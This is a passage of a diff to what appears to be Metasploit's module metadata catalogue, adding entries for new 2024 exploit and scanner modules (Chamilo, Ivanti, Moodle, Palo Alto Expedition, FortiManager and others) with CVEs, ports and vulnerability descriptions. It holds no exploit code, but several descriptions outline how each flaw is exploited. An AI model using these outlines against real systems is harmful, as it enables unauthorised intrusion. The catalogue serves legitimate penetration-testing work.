+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/http/support_center_plus_directory_traversal": {
    "name": "ManageEngine Support Center Plus Directory Traversal",
    "fullname": "auxiliary/scanner/http/support_center_plus_directory_traversal",
@@ -45562,6 +45952,67 @@
      }
    ]
  },
+  "auxiliary_scanner/http/wp_perfect_survey_sqli": {
+    "name": "WordPress Plugin Perfect Survey 1.5.1 SQLi (Unauthenticated)",
+    "fullname": "auxiliary/scanner/http/wp_perfect_survey_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2021-10-05",
+    "type": "auxiliary",
+    "author": [
+      "Aaryan Golatkar",
+      "Ron Jost"
+    ],
+    "description": "This module exploits a SQL injection vulnerability in the Perfect Survey\n          plugin for WordPress (version 1.5.1). An unauthenticated attacker can\n          exploit the SQLi to retrieve sensitive information such as usernames,\n          emails, and password hashes from the `wp_users` table.",
+    "references": [
+      "EDB-50766",
+      "CVE-2021-24762"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-12-10 14:48:18 +0000",
+    "path": "/modules/auxiliary/scanner/http/wp_perfect_survey_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/wp_perfect_survey_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/http/wp_registrationmagic_sqli": {
    "name": "Wordpress RegistrationMagic task_ids Authenticated SQLi",
    "fullname": "auxiliary/scanner/http/wp_registrationmagic_sqli",
@@ -55790,7 +56241,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2024-05-07 10:54:35 +0000",
+    "mod_time": "2024-11-11 12:33:11 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_version",
@@ -56879,7 +57330,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-06-03 11:02:15 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/eaton_xpert_backdoor",
@@ -56925,7 +57376,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-06-03 11:02:15 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/fortinet_backdoor",
@@ -57057,7 +57508,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-06-03 11:02:15 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/libssh_auth_bypass",
@@ -57649,6 +58100,67 @@

    ]
  },
+  "auxiliary_scanner/teamcity/teamcity_login": {
+    "name": "JetBrains TeamCity Login Scanner",
+    "fullname": "auxiliary/scanner/teamcity/teamcity_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "adfoster-r7",
+      "sjanusz-r7"
+    ],
+    "description": "This module performs login attempts against a JetBrains TeamCity webpage to bruteforce possible credentials.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8111,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-12-17 14:27:41 +0000",
+    "path": "/modules/auxiliary/scanner/teamcity/teamcity_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/teamcity/teamcity_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "account-lockouts"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/telephony/wardial": {
    "name": "Wardialer",
    "fullname": "auxiliary/scanner/telephony/wardial",
@@ -59685,7 +60197,8 @@
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
-      "tebo <tebodell@gmail.com>"
+      "tebo <tebodell@gmail.com>",
+      "h00die"
    ],
    "description": "This module scans for X11 servers that allow anyone\n        to connect without authentication.",
    "references": [
@@ -59702,7 +60215,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2024-11-27 14:29:44 +0000",
    "path": "/modules/auxiliary/scanner/x11/open_x11.rb",
    "is_install_path": true,
    "ref_name": "scanner/x11/open_x11",
@@ -59710,6 +60223,18 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "RelatedModules": [
+        "auxiliary/gather/x11_keyboard_spy"
+      ]
    },
    "session_types": false,
    "needs_cleanup": false,
@@ -61554,7 +62079,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-11-04 13:37:23 +0000",
+    "mod_time": "2024-11-12 18:23:31 +0000",
    "path": "/modules/auxiliary/server/relay/esc8.rb",
    "is_install_path": true,
    "ref_name": "server/relay/esc8",
@@ -66909,7 +67434,7 @@
    "targets": [
      "Apple iOS"
    ],
-    "mod_time": "2022-04-18 23:36:23 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/ssh/cydia_default_ssh",
@@ -67352,7 +67877,7 @@
      "PHP In-Memory",
      "Interactive SSH with jail break"
    ],
-    "mod_time": "2024-06-14 10:45:19 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb",
    "is_install_path": true,
    "ref_name": "freebsd/http/junos_phprc_auto_prepend_file",
@@ -70331,6 +70856,67 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/chamilo_bigupload_webshell": {
+    "name": "Chamilo v1.11.24 Unrestricted File Upload PHP Webshell",
+    "fullname": "exploit/linux/http/chamilo_bigupload_webshell",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-11-28",
+    "type": "exploit",
+    "author": [
+      "Ngo Wei Lin",
+      "jheysel-r7"
+    ],
+    "description": "Chamilo LMS is a free software e-learning and content management system. In versions prior to <= v1.11.24\n          a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter `action` is set to\n          `post-unsupported` file extension checks are skipped allowing for attacker controlled .php files to be uploaded to:\n          `/main/inc/lib/javascript/bigupload/files/` if the `/files/` directory already exists - it does not exist\n          by default.",
+    "references": [
+      "URL-https://starlabs.sg/advisories/23/23-4220/",
+      "URL-https://github.com/H4cking4All/CVE-2023-4220/tree/main",
+      "CVE-2023-4220"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP"
+    ],
+    "mod_time": "2024-11-14 10:46:11 +0000",
+    "path": "/modules/exploits/linux/http/chamilo_bigupload_webshell.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/chamilo_bigupload_webshell",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/chamilo_unauth_rce_cve_2023_34960": {
    "name": "Chamilo unauthenticated command injection in PowerPoint upload",
    "fullname": "exploit/linux/http/chamilo_unauth_rce_cve_2023_34960",
@@ -75559,6 +76145,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/ivanti_connect_secure_rce_cve_2024_37404": {
+    "name": "Ivanti Connect Secure Authenticated Remote Code Execution via OpenSSL CRLF Injection",
+    "fullname": "exploit/linux/http/ivanti_connect_secure_rce_cve_2024_37404",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-10-08",
+    "type": "exploit",
+    "author": [
+      "Richard Warren",
+      "Christophe De La Fuente"
+    ],
+    "description": "This module exploits a CRLF injection vulnerability in Ivanti Connect\n          Secure to achieve remote code execution (CVE-2024-37404). Versions\n          prior to 22.7R2.1 are vulnerable. Note that Ivanti Policy Secure\n          versions prior to 22.7R1.1 are also vulnerable but this module\n          doesn't support this software.\n\n          Valid administrative credentials are required. A non-administrative\n          user is also required and can be created using the administrative\n          account, if needed.",
+    "references": [
+      "CVE-2024-37404",
+      "URL-https://attackerkb.com/topics/FI5vcuGwyM/cve-2024-37404",
+      "URL-https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-and-Policy-Secure-CVE-2024-37404",
+      "URL-https://blog.amberwolf.com/blog/2024/october/cve-2024-37404-ivanti-connect-secure-authenticated-rce-via-openssl-crlf-injection/"
+    ],
+    "platform": "Linux",
+    "arch": "x86",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2024-12-03 18:33:43 +0000",
+    "path": "/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_37404.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/ivanti_connect_secure_rce_cve_2024_37404",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs",
+        "account-logout"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/ivanti_csa_unauth_rce_cve_2021_44529": {
    "name": "Ivanti Cloud Services Appliance (CSA) Command Injection",
    "fullname": "exploit/linux/http/ivanti_csa_unauth_rce_cve_2021_44529",
@@ -75751,6 +76401,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/judge0_sandbox_escape_cve_2024_28189": {
+    "name": "Judge0 sandbox escape",
+    "fullname": "exploit/linux/http/judge0_sandbox_escape_cve_2024_28189",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-03-04",
+    "type": "exploit",
+    "author": [
+      "Tanto Security",
+      "Takahiro Yokoyama"
+    ],
+    "description": "Judge0 does not account for symlinks placed inside the sandbox directory,\n          which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.",
+    "references": [
+      "CVE-2024-28185",
+      "CVE-2024-28189",
+      "URL-https://tantosec.com/blog/judge0/"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 2358,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command"
+    ],
+    "mod_time": "2024-10-23 07:29:21 +0000",
+    "path": "/modules/exploits/linux/http/judge0_sandbox_escape_cve_2024_28189.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/judge0_sandbox_escape_cve_2024_28189",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/kafka_ui_unauth_rce_cve_2023_52251": {
    "name": "Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.",
    "fullname": "exploit/linux/http/kafka_ui_unauth_rce_cve_2023_52251",
@@ -77625,6 +78338,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/moodle_rce": {
+    "name": "Moodle Remote Code Execution (CVE-2024-43425)",
+    "fullname": "exploit/linux/http/moodle_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-08-27",
+    "type": "exploit",
+    "author": [
+      "Michael Heinzl",
+      "RedTeam Pentesting GmbH"
+    ],
+    "description": "This module exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution.\n          Affected versions include 4.4 to 4.4.1, 4.3 to 4.3.5, 4.2 to 4.2.8, 4.1 to 4.1.11, and earlier unsupported versions.",
+    "references": [
+      "URL-https://blog.redteam-pentesting.de/2024/moodle-rce/",
+      "URL-https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/",
+      "URL-https://moodle.org/mod/forum/discuss.php?d=461193",
+      "CVE-2024-43425"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command"
+    ],
+    "mod_time": "2024-11-13 03:40:22 +0000",
+    "path": "/modules/exploits/linux/http/moodle_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/moodle_rce",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/multi_ncc_ping_exec": {
    "name": "D-Link/TRENDnet NCC Service Command Injection",
    "fullname": "exploit/linux/http/multi_ncc_ping_exec",
@@ -79577,6 +80352,75 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/paloalto_expedition_rce": {
+    "name": "Palo Alto Expedition Remote Code Execution (CVE-2024-5910 and CVE-2024-9464)",
+    "fullname": "exploit/linux/http/paloalto_expedition_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-10-09",
+    "type": "exploit",
+    "author": [
+      "Michael Heinzl",
+      "Zach Hanley",
+      "Enrique Castillo",
+      "Brian Hysell"
+    ],
+    "description": "Obtain remote code execution in Palo Alto Expedition version 1.2.91 and below.\n          The first vulnerability, CVE-2024-5910, allows to reset the password of the admin user, and the second vulnerability, CVE-2024-9464, is an authenticated OS command injection. In a default installation, commands will get executed in the context of www-data.\n          When credentials are provided, this module will only exploit the second vulnerability. If no credentials are provided, the module will first try to reset the admin password and then perform the OS command injection.",
+    "references": [
+      "URL-https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/",
+      "URL-https://security.paloaltonetworks.com/PAN-SA-2024-0010",
+      "URL-https://security.paloaltonetworks.com/CVE-2024-5910",
+      "URL-https://attackerkb.com/topics/JwTzQJuBmn/cve-2024-5910",
+      "URL-https://attackerkb.com/topics/ky1MIrne9r/cve-2024-9464",
+      "CVE-2024-5910",
+      "CVE-2024-24809"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Command"
+    ],
+    "mod_time": "2024-11-12 15:15:15 +0000",
+    "path": "/modules/exploits/linux/http/paloalto_expedition_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/paloalto_expedition_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk",
+        "account-lockouts"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/pandora_fms_events_exec": {
    "name": "Pandora FMS Events Remote Command Execution",
    "fullname": "exploit/linux/http/pandora_fms_events_exec",
@@ -80516,6 +81360,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/projectsend_unauth_rce": {
+    "name": "ProjectSend r1295 - r1605 Unauthenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/projectsend_unauth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-07-19",
+    "type": "exploit",
+    "author": [
+      "Florent Sicchio",
+      "Hugo Clout",
+      "ostrichgolf"
+    ],
+    "description": "This module exploits an improper authorization vulnerability in ProjectSend versions r1295 through r1605.\n          The vulnerability allows an unauthenticated attacker to obtain remote code execution by enabling user registration,\n          disabling the whitelist of allowed file extensions, and uploading a malicious PHP file to the server.",
+    "references": [
+      "CVE-2024-11680",
+      "URL-https://github.com/projectsend/projectsend/commit/193367d937b1a59ed5b68dd4e60bd53317473744",
+      "URL-https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf",
+      "CVE-2024-11680"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP Command"
+    ],
+    "mod_time": "2024-12-11 13:54:06 +0000",
+    "path": "/modules/exploits/linux/http/projectsend_unauth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/projectsend_unauth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pulse_secure_cmd_exec": {
    "name": "Pulse Secure VPN Arbitrary Command Execution",
    "fullname": "exploit/linux/http/pulse_secure_cmd_exec",
@@ -80654,6 +81562,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/pyload_js2py_cve_2024_39205": {
+    "name": "Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)",
+    "fullname": "exploit/linux/http/pyload_js2py_cve_2024_39205",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-10-28",
+    "type": "exploit",
+    "author": [
+      "Marven11",
+      "Spencer McIntyre",
+      "jheysel-r7"
+    ],
+    "description": "CVE-2024-28397 is sandbox escape in js2py (<=0.74) which is a popular python package that can evaluate\n          javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference\n          to a python object in the js2py environment enabling them to escape the sandbox, bypass pyimport restrictions\n          and execute arbitrary commands on the host. At the time of writing no patch has been released, version 0.74\n          is the latest version of js2py which was released Nov 6, 2022.\n\n          CVE-2024-39205 is an remote code execution vulnerability in Pyload (<=0.5.0b3.dev85) which is an open-source\n          download manager designed to automate file downloads from various online sources. Pyload is vulnerable because\n          it exposes the vulnerable js2py functionality mentioned above on the /flash/addcrypted2 API endpoint.\n          This endpoint was designed to only accept connections from localhost but by manipulating the HOST header we\n          can bypass this restriction in order to access the API to achieve unauth RCE.",
+    "references": [
+      "CVE-2024-39205",
+      "CVE-2024-28397",
+      "URL-https://github.com/Marven11/CVE-2024-39205-Pyload-RCE",
+      "URL-https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g",
+      "URL-https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 9666,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2024-11-14 12:47:35 +0000",
+    "path": "/modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pyload_js2py_cve_2024_39205",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pyload_js2py_exec": {
    "name": "pyLoad js2py Python Execution",
    "fullname": "exploit/linux/http/pyload_js2py_exec",
@@ -83753,7 +84727,7 @@
    "targets": [
      "Ubiquiti airOS < 5.6.2"
    ],
-    "mod_time": "2022-04-14 17:25:48 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb",
    "is_install_path": true,
    "ref_name": "linux/http/ubiquiti_airos_file_upload",
@@ -88020,6 +88994,71 @@

    ]
  },
+  "exploit_linux/local/gameoverlay_privesc": {
+    "name": "GameOver(lay) Privilege Escalation and Container Escape",
+    "fullname": "exploit/linux/local/gameoverlay_privesc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-07-26",
+    "type": "exploit",
+    "author": [
+      "g1vi",
+      "h00die",
+      "bwatters-r7",
+      "gardnerapp"
+    ],
+    "description": "This module exploits the use of unsafe functions in a number of Ubuntu kernels\n          utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux\n          kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent\n          changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is\n          called during ovl_do_setxattr without calling the intermediate safety function\n          vfs_setxattr. Ultimatly this module allows for root access to be achieved by\n          writing setuid capabilities to a file which are not sanitized after being unioned\n          with the upper mounted directory.",
+    "references": [
+      "URL-https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/",
+      "URL-https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629",
+      "URL-https://www.cvedetails.com/cve/CVE-2023-2640/",
+      "URL-https://www.cvedetails.com/cve/CVE-2023-32629/",
+      "URL-https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability",
+      "CVE-2023-32629",
+      "CVE-2023-2640"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Linux_Binary",
+      "Linux_Command"
+    ],
+    "mod_time": "2024-12-17 16:52:24 +0000",
+    "path": "/modules/exploits/linux/local/gameoverlay_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/gameoverlay_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
  "exploit_linux/local/glibc_ld_audit_dso_load_priv_esc": {
    "name": "glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation",
    "fullname": "exploit/linux/local/glibc_ld_audit_dso_load_priv_esc",
@@ -90885,6 +91924,64 @@

    ]
  },
+  "exploit_linux/local/vcenter_sudo_lpe": {
+    "name": "vCenter Sudo Privilege Escalation",
+    "fullname": "exploit/linux/local/vcenter_sudo_lpe",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2024-06-18",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Matei \"Mal\" Badanoiu"
+    ],
+    "description": "VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D\n          contains multiple local privilege escalation vulnerabilities\n          due to misconfiguration of sudo. An authenticated local user\n          with non-administrative privileges may exploit these issues\n          to elevate privileges to root on vCenter Server Appliance.\n\n          Tested against VMware vCenter Server Appliance 8.0.0.10000 20519528",
+    "references": [
+      "URL-https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453",
+      "URL-https://github.com/mbadanoiu/CVE-2024-37081/blob/main/VMware%20vCenter%20-%20CVE-2024-37081.pdf",
+      "CVE-2024-37081"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2024-12-04 18:39:43 +0000",
+    "path": "/modules/exploits/linux/local/vcenter_sudo_lpe.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/vcenter_sudo_lpe",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": [
+
+    ]
+  },
  "exploit_linux/local/vmware_alsa_config": {
    "name": "VMware Workstation ALSA Config File Local Privilege Escalation",
    "fullname": "exploit/linux/local/vmware_alsa_config",
@@ -91545,6 +92642,59 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/misc/asterisk_ami_originate_auth_rce": {
+    "name": "Asterisk AMI Originate Authenticated RCE",
+    "fullname": "exploit/linux/misc/asterisk_ami_originate_auth_rce",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2024-08-08",
+    "type": "exploit",
+    "author": [
+      "Brendan Coles <bcoles@gmail.com>",
+      "h00die",
+      "NielsGaljaard"
+    ],
+    "description": "On Asterisk, prior to versions 18.24.2, 20.9.2, and 21.4.2 and certified-asterisk\n          versions 18.9-cert11 and 20.7-cert2, an AMI user with 'write=originate' may change\n          all configuration files in the '/etc/asterisk/' directory. Writing a new extension\n          can be created which performs a system command to achieve RCE as the asterisk service\n          user (typically asterisk).\n          Default parking lot in FreePBX is called \"Default lot\" on the website interface,\n          however its actually 'parkedcalls'.\n          Tested against Asterisk 19.8.0 and 18.16.0 on Freepbx SNG7-PBX16-64bit-2302-1.",
+    "references": [
+      "URL-https://github.com/asterisk/asterisk/security/advisories/GHSA-c4cg-9275-6w44",
+      "CVE-2024-42365"
+    ],
+    "platform": "Unix",
+    "arch": "",
+    "rport": 5038,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2024-11-28 20:24:25 +0000",
+    "path": "/modules/exploits/linux/misc/asterisk_ami_originate_auth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/misc/asterisk_ami_originate_auth_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/misc/asus_infosvr_auth_bypass_exec": {
    "name": "ASUS infosvr Auth Bypass Command Execution",
    "fullname": "exploit/linux/misc/asus_infosvr_auth_bypass_exec",
@@ -91841,6 +92991,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/misc/fortimanager_rce_cve_2024_47575": {
+    "name": "Fortinet FortiManager Unauthenticated RCE",
+    "fullname": "exploit/linux/misc/fortimanager_rce_cve_2024_47575",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-10-23",
+    "type": "exploit",
+    "author": [
+      "sfewer-r7"
+    ],
+    "description": "This module exploits a missing authentication vulnerability affecting FortiManager and FortiManager\n          Cloud devices to achieve unauthenticated RCE with root privileges.\n\n          The vulnerable FortiManager versions are:\n          * 7.6.0\n          * 7.4.0 through 7.4.4\n          * 7.2.0 through 7.2.7\n          * 7.0.0 through 7.0.12\n          * 6.4.0 through 6.4.14\n          * 6.2.0 through 6.2.12\n\n          The vulnerable FortiManager Cloud versions are:\n          * 7.4.1 through 7.4.4\n          * 7.2.1 through 7.2.7\n          * 7.0.1 through 7.0.12\n          * 6.4 (all versions).",
+    "references": [
+      "CVE-2024-47575",
+      "URL-https://attackerkb.com/topics/OFBGprmpIE/cve-2024-47575/rapid7-analysis",
+      "URL-https://bishopfox.com/blog/a-look-at-fortijump-cve-2024-47575",
+      "URL-https://fortiguard.fortinet.com/psirt/FG-IR-24-423"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 541,
+    "autofilter_ports": [
+
+    ],
